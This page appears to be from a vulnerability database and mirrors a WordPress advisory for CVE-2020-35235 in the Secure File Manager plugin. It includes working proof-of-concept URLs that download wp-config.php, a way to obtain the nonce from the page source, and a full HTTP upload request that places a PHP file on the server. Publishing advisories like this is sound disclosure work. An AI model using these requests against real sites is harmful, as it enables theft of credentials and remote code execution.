Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWpvulndbWPEX-ID:47C1639F-4558-4CB6-8F50-E5E8564663C2
HistoryNov 23, 2020 - 12:00 a.m.

Secure File Manager < 2.8.2 - Authenticated Remote Command Execution

2020-11-2300:00:00
wpvulndb
324

0.005 Low

EPSS

Percentile

76.6%

JSON

The Secure File Manager uses the elFinder libraries in an insecure way, allowing authenticated users to execute arbitrary file management commands. v2.6 attempted to fix the issue by adding a CSRF nonce, however the nonce is displayed for all users in the Dashboard via the Secure File Manager menu (even though it will display an Unauthorized Access error for non admin users)

Download the wp-config.php

< 2.6 - As an unauthenticated user, open /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&cpath=/wp-admin/admin.php

< 2.8.2 - Log in as any user, access the Secure File Manager menu (wp-admin/admin.php?page=sfm_file_manager) which will result in an Unauthorized Access error unless logged in as admin, view the source of the page and retrieve the value of the sfmpNonceKey. Then append it to the URL above in a _wnonce parameter:

/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&_wpnonce=69f62e1414&cpath=/wp-admin/admin.php


RCE can be obtained as well, with a crafted request to upload a PHP file, e.g /hello-user.php

for < 2.8.2, get the nonce with the same technique as above
for < 2.6, just remove the _wpnonce parameter

POST /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/admin.php?page=sfm_file_manager
Content-Type: multipart/form-data; boundary=---------------------------32138351926630035821198693946
Content-Length: 851
Origin: http://127.0.0.1
Connection: close
Cookie: [Subscriber cookie]

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="reqid"

1770034af3e3c9
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="cmd"

upload
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="_wpnonce"

69f62e1414
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="upload[]"; filename="hello-user.php"
Content-Type: text/plain

<?php echo 'failed'; ?>

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="mtime[]"

1375102826
-----------------------------32138351926630035821198693946--

Related

vulnrichment 1
wpvulndb 1
cvelist 1
nvd 1
prion 1
cve 1
vulnrichment
vulnrichment
CVE-2020-35235
2020-12-14 02:20:27
wpvulndb
wpvulndb
Secure File Manager < 2.8.2 - Authenticated Remote Command Execution
2020-11-23 00:00:00
cvelist
cvelist
CVE-2020-35235
2020-12-14 02:20:27
nvd
nvd
CVE-2020-35235
2020-12-14 03:15:13
prion
prion
Remote code execution
2020-12-14 03:15:00
cve
cve
CVE-2020-35235
2020-12-14 03:15:13

0.005 Low

EPSS

Percentile

76.6%

JSON
Related for WPEX-ID:47C1639F-4558-4CB6-8F50-E5E8564663C2
vulnrichment1wpvulndb1cvelist1nvd1prion1cve1